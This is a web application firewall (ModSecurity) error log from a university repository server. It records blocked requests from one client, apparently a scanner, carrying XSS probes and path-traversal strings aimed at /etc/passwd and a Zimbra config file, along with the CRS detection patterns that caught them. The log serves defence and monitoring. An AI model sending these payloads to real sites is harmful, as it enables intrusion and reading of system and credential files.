[Tue Aug 29 11:52:21.168491 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAn0GdcAAAAa"]
[Tue Aug 29 11:52:21.900631 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hcCo-f0AAAoLfEQAAAAG"]
[Tue Aug 29 11:52:23.586098 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoN9b0AAAAJ"]
[Tue Aug 29 11:52:24.833499 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAlIBmEAAAAn"]
[Tue Aug 29 11:52:25.637510 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAnn2C4AAAAe"]
[Tue Aug 29 11:52:26.607590 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAoQ3IAAAAAN"]
[Tue Aug 29 11:52:26.617536 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAnjjOYAAAAX"]
[Tue Aug 29 11:52:26.627571 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAoMLawAAAAH"]
[Tue Aug 29 11:52:26.651131 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoMLa0AAAAH"]
[Tue Aug 29 11:52:27.582571 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoLfFcAAAAG"]
[Tue Aug 29 11:52:27.608146 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAlIBmkAAAAn"]
[Tue Aug 29 11:52:28.560434 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAnn2DYAAAAe"]
[Tue Aug 29 11:52:28.686747 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAn401UAAAAW"]
[Tue Aug 29 11:52:29.580206 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAoPuUAAAAAM"]
[Tue Aug 29 11:52:30.612651 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAoEZPcAAAAB"]
[Tue Aug 29 11:52:33.563996 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kcCo-f0AAAlUls0AAAA0"]
[Tue Aug 29 11:52:33.713713 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAoGFYgAAAAE"]
[Tue Aug 29 11:52:33.736352 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoO5z0AAAAK"]
[Tue Aug 29 11:52:34.543773 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAnd3H8AAAAI"]
[Tue Aug 29 11:52:34.639937 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAn402UAAAAW"]
[Tue Aug 29 11:52:37.535463 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lcCo-f0AAAoT7NQAAAAD"]
[Tue Aug 29 11:52:37.569320 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoPuV8AAAAM"]
[Tue Aug 29 11:52:37.615594 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAoT7NcAAAAD"]
[Tue Aug 29 11:52:40.611197 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAfWOQUAAAAL"]
[Tue Aug 29 11:52:40.638956 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAnd3JsAAAAI"]
[Tue Aug 29 11:52:41.721069 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoLfJEAAAAG"]
[Tue Aug 29 11:52:42.610467 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnd3KcAAAAI"]
[Tue Aug 29 11:52:43.547539 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15m8Co-f0AAAnHQnEAAAAT"]
